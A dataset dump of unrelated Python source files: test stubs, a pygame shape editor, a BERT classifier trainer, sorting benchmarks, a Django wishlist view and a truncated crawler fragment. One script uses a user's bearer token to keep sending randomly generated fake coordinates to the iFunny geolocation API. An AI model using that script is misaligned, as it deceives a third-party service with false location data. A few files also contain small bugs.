[\n models.TwitterUser(screen_name=f'shared_follower_{idx}')\n for idx in range(NUM_SHARED)\n ]\n right_users = [\n models.TwitterUser(screen_name=f'right_follower_{idx}')\n for idx in range(NUM_RIGHT)\n ]\n dbsession.add_all(left_users)\n dbsession.add_all(shared_users)\n dbsession.add_all(right_users)\n for user in left_users:\n left.follow(user)\n for user in shared_users:\n left.follow(user)\n right.follow(user)\n for user in right_users:\n right.follow(user)\n\n # WHEN\n resp = client.get(f'/twitter/followers/intersect/{left.id}/{right.id}')\n assert resp.status_code == 200\n\n # THEN\n assert resp.json == len(shared_users)\n\n\n@pytest.mark.fourth\ndef test__second_requirement(client):\n # GIVEN\n pass\n\n # WHEN\n\n # THEN\n\n\n@pytest.mark.fifth\ndef test__third_requirement(client):\n # GIVEN\n pass\n\n # WHEN\n\n # THEN\n","sub_path":"tests/test__interviewee.py","file_name":"test__interviewee.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161684983","text":"import pygame, sys\nfrom pokemon_edit.check import *\n\ndef check_draw(shapes, shape, shape_type, shape_color, pressed, buttons, move_type, index):\n selected = []\n position = pygame.mouse.get_pos()\n for event in [pygame.event.wait()]+pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n move_type, i = check_pressed_buttons(buttons, position, move_type)\n if i < 0:\n shape = [position, (0, 0)]\n pressed = True\n else:\n index = i\n elif event.type == pygame.MOUSEBUTTONUP:\n if shape:\n shapes[tuple(shape)] = [shape_type, shape_color]\n shape = None\n pressed = False\n elif pressed:\n if shape:\n shape[1] = (abs(position[0] - shape[0][0]), abs(position[1] - shape[0][1]))\n else:\n shape = [position, position]\n return move_type, index, shapes, shape, pressed, selected\n\ndef check_edit(buttons, shapes, move_type, index, selected, ctrl):\n position = pygame.mouse.get_pos()\n for event in [pygame.event.wait()]+pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LCTRL:\n ctrl = True\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LCTRL:\n ctrl = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n move_type, i = check_pressed_buttons(buttons, position, move_type)\n selection = check_click_in_shape(shapes, position)\n if i < 0:\n selected = check_click(selected, ctrl, selection)\n else:\n index = i\n return move_type, index, shapes, selected, ctrl\n\ndef check_attr(buttons, shapes, move_type, index):\n selected = []\n position = pygame.mouse.get_pos()\n for event in [pygame.event.wait()]+pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n move_type, i = check_pressed_buttons(buttons, position, move_type)\n selection = check_click_in_shape(shapes, position)\n if i < 0:\n selected = check_click(selected, ctrl, selection)\n else:\n index = i\n return move_type, index, selected","sub_path":"pokemon_edit/modes.py","file_name":"modes.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"251262529","text":"def h():\n print ('Wen Chuan')\n m = yield 5 # Fighting!\n print (m)\n d = yield 12\n print ('We are together!')\n\n\nc = h()\nm = c.next() # m 获取了yield 5 的参数值 5\nd = c.send('Fighting!') # d 获取了yield 12 的参数值12\nprint ('We will never forget the date', m, '.', d)\nm = b''.split(b'\\r\\n',1)","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261161525","text":"import random\nimport time\nimport torch\nimport numpy as np\nfrom pathlib import PurePath\nfrom sklearn.metrics import accuracy_score\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\nfrom ...common.loader import BertDatasets\nfrom .model import BertClassificationModel\nfrom ...common.utils import batch_print, set_seed\n\nCURR_PATH = PurePath(__file__).parent\nPRE_TRAINED_MODEL_PATH = str(CURR_PATH.parent.parent / \"res/bert_base_wwm/\")\n\ncp = None\npred_model_path = None\n\n\ndef train(data_path,\n model_path=None,\n train_size=0.8,\n model_params=None):\n \"\"\"\n :param model_params: finetune, label_weights, dropout, pre_trained_model_path,\n batch_size, lr, eps, epochs\n \"\"\"\n set_seed(2020)\n\n # updates params\n if not isinstance(model_params, dict):\n model_params = dict()\n finetune = model_params.get(\"finetune\", True)\n label_weights = model_params.get(\"label_weights\", None)\n hidden_dim = model_params.get(\"hidden_dim\", 50)\n dropout = model_params.get(\"dropout\", 0.3)\n pre_trained_model_path = model_params.get(\"pre_trained_model_path\", PRE_TRAINED_MODEL_PATH)\n batch_size = model_params.get(\"batch_size\", 64)\n lr = model_params.get(\"lr\", 1e-4)\n eps = model_params.get(\"eps\", 1e-8)\n epochs = model_params.get(\"epochs\", 5)\n n_jobs = model_params.get(\"n_jobs\", 1)\n\n # load training data\n bert_datasets = BertDatasets(path=data_path, pre_trained_path=pre_trained_model_path)\n train_data, test_data = bert_datasets.load(n_jobs=n_jobs, train_size=train_size, batch_size=batch_size)\n\n total_steps = len(train_data) * epochs\n\n # init the albert model\n model = BertClassificationModel(num_labels=bert_datasets.num_labels,\n finetune=finetune,\n label_weights=label_weights,\n hidden_dim=hidden_dim,\n dropout=dropout,\n pre_trained_model_path=pre_trained_model_path)\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n\n optimizer = AdamW(model.parameters(), lr=lr, eps=eps)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=total_steps)\n\n for name, param in model.named_parameters():\n print(name, param.shape, param.device, param.requires_grad)\n\n for epoch in range(epochs):\n start_time = time.time()\n # training\n model.train()\n train_loss = 0\n avg_train_loss = 0\n for i, train in enumerate(train_data):\n train_input_ids = train[0].to(device)\n train_input_mask = train[1].to(device)\n train_labels = train[2].to(device)\n\n logits, loss = model(word_seq_tensor=train_input_ids,\n word_mask_tensor=train_input_mask,\n labels=train_labels)\n train_loss += loss.item()\n avg_train_loss = train_loss / (i + 1)\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n\n optimizer.step()\n scheduler.step()\n\n batch_print(\"[Epoch] \\033[34m{:0>3d}\\033[0m\".format(epoch),\n \"[Batch] \\033[34m{:0>5d}\\033[0m\".format(i),\n \"[lr] \\033[34m{:0>.6f}\\033[0m\".format(scheduler.get_lr()[0]),\n \"[avg train loss] \\033[34m{:0>.4f}\\033[0m\".format(avg_train_loss),\n \"[time] \\033[34m{:<.0f}s\\033[0m\".format(time.time() - start_time),\n flag=\"batch\")\n\n # on-time evaluate model\n model.eval()\n test_loss = 0\n avg_test_loss = 0\n pred_labels, test_labels = [], []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n test_label = test[2].to(device)\n\n with torch.no_grad():\n pred_label, loss = model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask,\n labels=test_label)\n pred_labels.append(torch.argmax(pred_label.cpu(), -1).float())\n test_labels.append(torch.argmax(test_label.cpu(), -1))\n test_loss += loss\n avg_test_loss = test_loss / (i + 1)\n\n batch_print(\"[Epoch] \\033[34m{:0>3d}\\033[0m\".format(epoch),\n \"[lr] \\033[34m{:0>.6f}\\033[0m\".format(scheduler.get_lr()[0]),\n \"[avg train loss] \\033[34m{:0>.4f}\\033[0m\".format(avg_train_loss),\n \"[avg test lost] \\033[34m{:>0.4f}\\033[0m\".format(avg_test_loss),\n \"[time] \\033[34m{:<.0f}s\\033[0m\".format(time.time() - start_time),\n flag=\"epoch\")\n\n if epoch == epochs - 1:\n acc = accuracy_score(torch.cat(pred_labels, dim=-1).numpy(), torch.cat(test_labels, dim=-1).numpy())\n print(\"The model test accuracy is: \\033[34m{:.5}\\033[0m\".format(acc))\n\n # save model\n if model_path is not None:\n _save_model(path=model_path, model=model, pre_trained_model_path=pre_trained_model_path,\n max_length=bert_datasets.max_length, label2index=bert_datasets.label2idx)\n\n\ndef predict(data=None, data_path=None, model_path=None, **kwargs):\n global cp\n global pred_model_path\n if model_path != pred_model_path:\n cp = _load_model(model_path)\n if cp is None:\n cp = _load_model(model_path)\n pred_model_path = model_path\n\n model = cp['model']\n model.finetune = False\n pre_trained_model_path = cp['pre_trained_model_path']\n max_length = cp['max_length']\n label2index = cp['label2index']\n index2label = {v: k for k, v in label2index.items()}\n\n albert_datasets = BertDatasets(path=data_path, data=data, pre_trained_path=pre_trained_model_path)\n test_data = albert_datasets.loadp(max_length=max_length, label2index=label2index, batch_size=64)\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n\n model.eval()\n pred_labels = []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n\n with torch.no_grad():\n pred_label, loss = model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask)\n pred_labels.append(torch.argmax(pred_label.cpu().detach(), -1).float())\n\n pred_label = [index2label[index] for index in torch.cat(pred_labels, dim=-1).numpy()]\n return pred_label\n\n\nclass Predictor:\n def __init__(self, model_path):\n cp = _load_model(model_path)\n self.model = cp['model']\n self.model.finetune = False\n self.pre_trained_model_path = cp['pre_trained_model_path']\n self.max_length = cp['max_length']\n self.label2index = cp['label2index']\n self.index2label = {v: k for k, v in self.label2index.items()}\n\n def predict(self, data=None, data_path=None):\n albert_datasets = BertDatasets(path=data_path, data=data, pre_trained_path=self.pre_trained_model_path)\n test_data = albert_datasets.loadp(max_length=self.max_length, label2index=self.label2index, batch_size=64)\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.model.to(device)\n\n self.model.eval()\n pred_labels = []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n\n with torch.no_grad():\n pred_label, loss = self.model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask)\n pred_labels.append(torch.argmax(pred_label.cpu().detach(), -1).float())\n\n pred_label = [self.index2label[index] for index in torch.cat(pred_labels, dim=-1).numpy()]\n return pred_label\n\n\ndef _save_model(path, model, pre_trained_model_path, max_length, label2index):\n torch.save({\n 'model': model,\n 'pre_trained_model_path': pre_trained_model_path,\n 'max_length': max_length,\n 'label2index': label2index\n }, path)\n\n\ndef _load_model(path):\n cp = torch.load(path)\n return cp\n","sub_path":"xatc/models/bert_classifier/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250873865","text":"N = int(input())\nS = input()\nT = input()\n\nif S == T:\n print(N)\n exit()\nfor i in reversed(range(N)):\n if S[N-i-1:] == T[:i+1]:\n print(2*N - i - 1)\n exit()\n else:\n continue\n\nprint(2*N)","sub_path":"Python_codes/p03951/s460938759.py","file_name":"s460938759.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55791406","text":"import time\n\n#insertion w set 10 inputs\nprint(\"Insertion Program:\")\nt0 = time.time()\n\ndef insertionSort(alist):\n for index in range(1,len(alist)):\n\n currentvalue = alist[index]\n position = index\n\n while position>0 and alist[position-1]>currentvalue:\n alist[position]=alist[position-1]\n position = position-1\n\n alist[position]=currentvalue\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\ninsertionSort(alist)\nprint(alist)\nt1 = time.time()\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n\n#quicksort w set 10 inputs\n\nprint(\"Quicksort Program:\") \n\nt0 = time.time() \n\ndef quickSort(alist):\n quickSortHelper(alist,0,len(alist)-1)\n\ndef quickSortHelper(alist,first,last):\n if first= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark -1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = alist[leftmark]\n alist[leftmark] = alist[rightmark]\n alist[rightmark] = temp\n\n temp = alist[first]\n alist[first] = alist[rightmark]\n alist[rightmark] = temp\n\n\n return rightmark\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\nquickSort(alist)\nprint(alist)\n\nt1 = time.time()\n\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n\n#selection with 10 set inputs\nprint(\"Selection Program:\") \n\nt0 = time.time()\n\ndef selectionSort(alist):\n for fillslot in range(len(alist)-1,0,-1):\n positionOfMax=0\n for location in range(1,fillslot+1):\n if alist[location]>alist[positionOfMax]:\n positionOfMax = location\n\n temp = alist[fillslot]\n alist[fillslot] = alist[positionOfMax]\n alist[positionOfMax] = temp\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\nselectionSort(alist)\nprint(alist)\n\nt1 = time.time()\n\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n","sub_path":"022.3 run time 10 input.py","file_name":"022.3 run time 10 input.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"387153959","text":"# Copyright April 2019.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Dominate Particle Network (DPN) agent.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nimport math\n\n\nfrom dopamine.agents.rainbow import rainbow_agent\nimport numpy as np\nimport tensorflow as tf\n\nimport gin.tf\n\nslim = tf.contrib.slim\n\n\n@gin.configurable\nclass DominantParticleAgent(rainbow_agent.RainbowAgent):\n \"\"\"An extension of Rainbow.\"\"\"\n\n def __init__(self,\n sess,\n num_actions,\n num_particles = 64,\n num_target_samples = 32,\n seed_dim = 5,\n blur = 0.05,\n scaling = 0.5,\n tau = 0.1,\n double_dqn=False,\n summary_writer=None,\n summary_writing_frequency=500):\n \"\"\"Initializes the agent and constructs the Graph.\n\n Args:\n sess: `tf.Session` object for running associated ops.\n num_actions: int, number of actions the agent can take at any state.\n \n \n double_dqn: boolean, whether to perform double DQN style learning\n as described in Van Hasselt et al.: https://arxiv.org/abs/1509.06461.\n summary_writer: SummaryWriter object for outputting training statistics.\n Summary writing disabled if set to None.\n summary_writing_frequency: int, frequency with which summaries will be\n written. Lower values will result in slower training.\n \"\"\"\n # Number of particles supporting discrete measures\n self.num_particles = num_particles\n # Number of target dists draws for averaging loss over one transition\n self.num_target_samples = num_target_samples\n # Dimensionality of input noise vector\n self.seed_dim = seed_dim\n # Simulated annealing log step size\n self.blur = blur\n # Simulated annealing max log scale\n self.scaling = scaling \n # Simulated annealing scales for entropic regularization\n self.scales = [ np.exp(e) for e in np.arange(1, np.log(self.blur), np.log(self.scaling)) ] + [self.blur]\n # Temporal stepsize for potential energy functional (2*h in paper)\n self.tau= tau\n # Particle weights are all equally-likely\n self.a_i = tf.tile([1.0/self.num_particles],[self.num_particles])[:,None]\n # Particle weights in the log domain\n self.loga_i = tf.math.log(self.a_i)\n self.logb_i = tf.math.log(self.a_i)\n # Option to perform double dqn.\n self.double_dqn = double_dqn\n\n super(DominantParticleAgent, self).__init__(\n sess=sess,\n num_actions=num_actions,\n summary_writer=summary_writer,\n summary_writing_frequency=summary_writing_frequency)\n\n def _get_network_type(self):\n \"\"\"Returns the type of the outputs of the Dominate Particle Network.\n\n Returns:\n _network_type object defining the outputs of the network.\n \"\"\"\n return collections.namedtuple('dpa_network', ['particle_locs'])\n\n def _network_template(self, state, num_draws = 1):\n r\"\"\"Builds a Dominate Particle Network.\n\n Takes state and seed as inputs and outputs particle vectors that support\n finite return distributions for every action.\n\n Args:\n state: A `tf.placeholder` for the RL state.\n num_draws: int for the number of draws of return dists \n\n Returns:\n _network_type object containing particle outputs of the network.\n \"\"\"\n\n weights_initializer = slim.variance_scaling_initializer(\n factor=1.0 / np.sqrt(3.0), mode='FAN_IN', uniform=True)\n\n # Prepare image (state) input\n state_net = tf.cast(state, tf.float32)\n state_net = tf.math.divide(state_net, 255.)\n\n # Tile the batch dimension for each network draw \n # (batch_size x num_draws, state_dims)\n batch_size = state_net.get_shape().as_list()[0]\n state_net = tf.tile(state_net,[num_draws,1,1,1])\n\n # Convolutional portion to extract image features\n state_net = slim.conv2d(\n state_net, 32, [8, 8], stride=4,\n weights_initializer=weights_initializer)\n state_net = slim.conv2d(\n state_net, 64, [4, 4], stride=2,\n weights_initializer=weights_initializer)\n state_net = slim.conv2d(\n state_net, 64, [3, 3], stride=1,\n weights_initializer=weights_initializer)\n\n # Flatten image features and tile for num particles\n # (batch_size, feature_dim)\n state_net = slim.flatten(state_net) # image features\n\n # Prepare noise input\n # (batch_size x num_draws, seed_dim)\n seed_net = tf.random_normal([batch_size*num_draws,self.seed_dim],dtype=tf.float32)\n\n # Join the two image features and the seed as input to the\n # fully-connected portion of the network\n # (batch_size x num_draws x num_particles, feature_dim + seed_dim)\n net = tf.concat([state_net, seed_net],1) \n net = tf.tile(net, [self.num_particles, 1])\n\n # The fully-connected portion maps image features and noise\n # to vectors of particle locations for each action\n net = slim.fully_connected(net, 512, weights_initializer=weights_initializer)\n particle_locs = slim.fully_connected(net,self.num_actions,\n activation_fn=None,weights_initializer=weights_initializer)\n\n return self._get_network_type()(particle_locs=particle_locs)\n\n def _build_networks(self):\n \"\"\"Builds the DPN computations needed for acting and training.\n\n These are:\n self.online_convnet: For computing the current state's return particle locations.\n self.target_convnet: For computing the next state's target return particle locations\n values.\n self._net_outputs: The return particle locations.\n self._q_argmax: The action maximizing the current state's Q-values.\n self._replay_net_outputs: The replayed states' return particle locations.\n self._replay_next_target_net_outputs: The replayed next states' target return particle locations.\n \"\"\"\n # Calling online_convnet will generate a new graph as defined in\n # self._get_network_template using whatever input is passed, but will always\n # share the same weights.\n self.online_convnet = tf.make_template('Online', self._network_template)\n self.target_convnet = tf.make_template('Target', self._network_template)\n\n # Compute the Q-values which are used for action selection in the current\n # state.\n self._net_outputs = self.online_convnet(self.state_ph,1)\n\n # Shape of self._net_outputs.quantile_values:\n # num_particles x num_actions.\n # e.g. if num_actions is 2, it might look something like this:\n # Vals for Quantile .2 Vals for Quantile .4 Vals for Quantile .6\n # [[0.1, 0.5], [0.15, -0.3], [0.15, -0.2]]\n # Q-values = [(0.1 + 0.15 + 0.15)/3, (0.5 + 0.15 + -0.2)/3].\n self._q_values = tf.reduce_mean(self._net_outputs.particle_locs, axis=0)\n self._q_argmax = tf.argmax(self._q_values, axis=0)\n\n self._replay_net_outputs = self.online_convnet(self._replay.states, 1)\n # Shape: (batch_size x num_particles) x num_actions. \n self._replay_net_particle_locs = self._replay_net_outputs.particle_locs\n\n # Do the same for next states in the replay buffer.\n self._replay_net_target_outputs = self.target_convnet(self._replay.next_states, self.num_target_samples)\n # Shape: (batch_size x num_target_samples x num_particles) x num_actions.\n vals = self._replay_net_target_outputs.particle_locs\n self._replay_net_target_particle_locs = vals\n\n # Compute Q-values which are used for action selection for the next states\n # in the replay buffer. Compute the argmax over the Q-values.\n if self.double_dqn:\n outputs_action = self.online_convnet(self._replay.next_states, self.num_target_samples)\n else:\n outputs_action = self.target_convnet(self._replay.next_states, self.num_target_samples)\n\n # Shape: (num_particles x batch_size x num_target_samples) x num_actions.\n target_particle_locs_action = outputs_action.particle_locs\n # Shape: num_particles x (batch_size x num_target_samples) x num_actions.\n target_particle_locs_action = tf.reshape(target_particle_locs_action,\n [self.num_particles,\n self._replay.batch_size*self.num_target_samples,\n self.num_actions])\n \n # Shape: (batch_size x num_target_samples) x num_actions.\n self._replay_net_target_q_values = tf.squeeze(tf.reduce_mean(target_particle_locs_action, axis=0))\n\n # Shape: (batch_size x num_target_samples) x 1\n self._replay_next_qt_argmax = tf.argmax(self._replay_net_target_q_values, axis=1)\n\n def _build_target_quantile_values_op(self):\n \"\"\"Build an op used as a target for return values at given quantiles.\n\n Returns:\n An op calculating the target quantile return.\n \"\"\"\n batch_size = tf.shape(self._replay.rewards)[0]\n # Shape of rewards: (num_target_samples x num_particles x batch_size) x 1.\n rewards = self._replay.rewards[:, None]\n rewards = tf.tile(rewards, [self.num_particles*self.num_target_samples, 1])\n\n # Incorporate terminal state to discount factor.\n # size of gamma_with_terminal: (num_target_samples x num_particles x batch_size) x 1.\n is_terminal_multiplier = 1. - tf.cast(self._replay.terminals,tf.float32)\n gamma_with_terminal = self.cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = tf.tile(gamma_with_terminal[:, None], [self.num_particles*self.num_target_samples, 1])\n\n # Get the indices of the maximium Q-value across the action dimension.\n # Shape of replay_next_qt_argmax: (batch_size x num_target_samples x num_particles) x 1.\n replay_next_qt_argmax = tf.tile(self._replay_next_qt_argmax[:, None], [self.num_particles, 1])\n\n # Shape of batch_indices: (batch_size x num_target_samples x num_particles) x 1.\n batch_indices = tf.cast(tf.range(batch_size * self.num_target_samples * self.num_particles)[:, None], tf.int64)\n\n # Shape of batch_indexed_target_values:\n # (batch_size x num_target_samples x num_particles) x 2.\n batch_indexed_target_values = tf.concat([batch_indices, replay_next_qt_argmax], axis=1)\n\n # Shape of next_target_values: (batch_size x num_target_samples x num_particles) x 1.\n target_particle_set = tf.gather_nd(\n self._replay_net_target_particle_locs,\n batch_indexed_target_values)[:, None]\n\n return rewards + gamma_with_terminal * target_particle_set\n\n def _build_train_op(self):\n \"\"\"Builds a training op.\n\n Returns:\n train_op: An op performing one step of training from replay data.\n \"\"\"\n batch_size = tf.shape(self._replay.rewards)[0]\n\n # Shape: (batch_size x num_target_samples x num_particles) x 1\n target_particle_set = tf.stop_gradient(self._build_target_quantile_values_op())\n\n # Reshape to num_particles x batch_size x 1 since this is\n # the manner in which the target_quantile_values are tiled.\n target_particle_set = tf.reshape(target_particle_set,\n [self.num_particles,\n batch_size,\n self.num_target_samples, 1])\n\n # Transpose dimensions so that the dimensionality is batch_size x\n # self.num_particles x 1 to prepare for computation of\n # Bellman errors.\n # Final shape of target_quantile_values:\n # batch_size x num_target_samples x num_particles x 1.\n target_particle_set = tf.transpose(target_particle_set, [1, 2, 0, 3])\n\n # Shape of indices: (batch_size x num_particles) x 1.\n # Expand dimension by one so that it can be used to index into all the\n # particles when using the tf.gather_nd function (see below).\n indices = tf.range(batch_size * self.num_particles)[:, None]\n\n # Expand the dimension by one so that it can be used to index into all the\n # quantiles when using the tf.gather_nd function (see below).\n reshaped_actions = self._replay.actions[:, None]\n reshaped_actions = tf.tile(reshaped_actions, [self.num_particles, 1])\n\n # Shape of reshaped_actions: (batch_size x num_particles) x 2.\n reshaped_actions = tf.concat([indices, reshaped_actions], axis=1)\n\n # Reshape to self.num_particles x batch_size x 1 since this is the manner\n # in which the quantile values are tiled.\n # (batch_size x num_target_samples) x num_particles x 1.\n chosen_action_particles = tf.gather_nd(self._replay_net_particle_locs, reshaped_actions)[:,None]\n chosen_action_particles = tf.tile(chosen_action_particles,[self.num_target_samples,1])\n chosen_action_particles = tf.reshape(chosen_action_particles, \n [self.num_particles,batch_size,self.num_target_samples, 1])\n\n # Transpose dimensions so that the dimensionality is batch_size x\n # self.num_particles x 1 to prepare for computation of\n # Bellman errors.\n # Final shape of chosen_action_particles:\n # num_tau_samples = num_particles (keep until code runs)\n # num_tau_prime_samples = num_of_target_samples (keep until code runs)\n # batch_size x num_particles x 1.\n chosen_action_particles = tf.transpose(chosen_action_particles, [1, 2, 0, 3])\n\n # Shape of bellman_erors and huber_loss:\n # batch_size x num_target_samples x num_particles x 1.\n bellman_errors = target_particle_set - chosen_action_particles\n\n # Compute the L2 loss over the particles\n # batch_size x num_target_samples x 1\n l2_loss = tf.reduce_mean(0.5 * bellman_errors**2 , axis=2)\n\n # Compute the entropy-regulated Wasserstein loss\n # e-scaling heuristic (aka. simulated annealing): \n def KP_log(x,y,b_j_log, blur = 1.):\n \"\"\"\n Kernel product in the log domain\n x: source for grad (batch,num_target_samples,num_particles,1)\n y: target with no grad (batch,num_target_samples,num_particles,1)\n \"\"\"\n xmy = x[:,:,:,None,:] - y[:,:,None,:,:] # batch,samples,parts,parts,1, xmy[i,j,k] = (x_i[k]-y_j[k])\n C = - xmy**2 / (2*(blur**2))\n return (blur**2)*tf.reduce_logsumexp(C + b_j_log, axis=2,keepdims=True)\n\n # Solve the OT_e(a,b) problem\n f_i = tf.zeros([batch_size,self.num_target_samples,self.num_particles,1,1],dtype=tf.float32) \n g_j = tf.zeros([batch_size,self.num_target_samples,self.num_particles,1,1],dtype=tf.float32)\n for scale in self.scales:\n g_j = -KP_log(target_particle_set, chosen_action_particles, f_i/scale**2 + self.loga_i, blur=scale)\n f_i = -KP_log(chosen_action_particles, target_particle_set, g_j/scale**2 + self.logb_i, blur=scale)\n \n # Return the dual cost OT_e(a,b), assuming convergence in the Sinkhorn loop\n # batch_size x num_target_samples x 1\n Wb_loss = tf.reduce_mean(tf.squeeze(f_i),axis=2) + tf.reduce_mean(tf.squeeze(g_j),axis=2) \n\n # average loss over target samples\n # batch_size x 1\n proximal_loss_ij = tf.reduce_mean(Wb_loss + self.tau*l2_loss,axis=1)\n\n # total loss over replay buffer\n proximal_loss = tf.reduce_sum(proximal_loss_ij,axis=0)\n\n # TODO(kumasaurabh): Add prioritized replay functionality here.\n update_priorities_op = tf.no_op()\n with tf.control_dependencies([update_priorities_op]):\n if self.summary_writer is not None:\n with tf.variable_scope('Losses'):\n tf.summary.scalar('ProximalLoss', proximal_loss)\n return self.optimizer.minimize(proximal_loss), proximal_loss\n","sub_path":"dopamine/agents/dominant_particle/dominant_particle_agent.py","file_name":"dominant_particle_agent.py","file_ext":"py","file_size_in_byte":15836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"509444202","text":"horaInicial: int; horaFinal: int; duracao: int;\n\nhoraInicial = int(input(\"Hora inicial: \"))\nhoraFinal = int(input(\"Hora final: \"))\n\nif(horaFinal > horaInicial):\n duracao = horaFinal - horaInicial\nelse:\n duracao = 24 - (horaInicial - horaFinal)\n\nprint(f\"O JOGO DUROU {duracao} HORA(S)\")","sub_path":"Python/Tempo_de_jogo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45592644","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render, redirect, \tget_object_or_404\nfrom shop.models import Product\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Wishlist, WishlistItem\n\n\n@login_required\ndef wishlist_add(request, product_id,):\n\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n product = get_object_or_404(Product, id=product_id)\n item, itemCreated = WishlistItem.objects.update_or_create(wishlist=wishlist, product=product)\n wishlist.items.add(item)\n item.save()\n wishlist.save()\n return redirect('wishlist:wishlist_detail')\n\n\n@login_required\ndef wishlist_remove(request, product_id):\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n product = get_object_or_404(Product, id=product_id)\n wishlistItems = WishlistItem.objects.filter(wishlist=wishlist, product=product)\n wishlistItems.delete()\n return redirect('wishlist:wishlist_detail')\n\n\n@login_required\ndef wishlist_detail(request):\n wishlist, created = Wishlist.objects.update_or_create(user=request.user)\n return render(request, 'wishlist/wishlist_detail.html', {'wishlist': wishlist})\n","sub_path":"wishlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312697354","text":"import requests\nimport time\nimport random\n\n# insert your accounts bearer token here from the bearer token generator repo\nbearer_token = 'insert_your_token_here'\n\n\n# you may change these if you would like.\n# Warning: setting the update interval too fast (like around 3) could make your iFunny load slowly due to rate limiting. By default its set to 10 seconds.\nupdate_interval = 10\nlatitude_range = 0, 90\nlongitude_range = 0, 180\n\n\nlat, lon = random.uniform(*latitude_range), random.uniform(*longitude_range)\n\nwhile 1:\n url = 'https://api.ifunny.mobi/v4/geo'\n h = {'Authorization': 'Bearer ' + bearer_token}\n data = {\n 'lat': lat,\n 'lon': lon\n }\n r = requests.post(url, headers=h, data=data)\n try:\n r.raise_for_status()\n print('Updated geo location with coordinates:', lat, lon)\n except requests.exceptions.HTTPError:\n print('The server returned an error: ' + r.json()['error_description'])\n time.sleep(update_interval)\n","sub_path":"run_me.py","file_name":"run_me.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45592454","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport sys\nimport pandas as pd\nfrom loguru import logger\n\nfrom crawl.crawl import crawler\nfrom crawl import logs\nfrom parse.parse import parser\nfrom database import database\nfrom database import utils as db_utils\nfrom database import date as db_dates\n\n\ndef log_performance(raw, parsed):\n '''\n Compare raw data and parsed data and log results\n Params : dict, dict\n Return: None\n '''\n logger_resume.info(\"- Downloaded data : {} values for {} rows using {} MB \\\n \\n- Parsed data : {} values for {} rows using {} MB\", \\\n raw['values'], raw['rows'], raw['memory'] / 1000000, \\\n parsed['values'], parsed['rows'], parsed['memory'] / 1000000)\n\ndef get_metadata(meta, df):\n '''\n Read pandas dataframe metadata such as size, shape and mem usage\n Params : dictionary, dataframe\n Return : dictionary\n '''\n meta['values'] += df.size\n 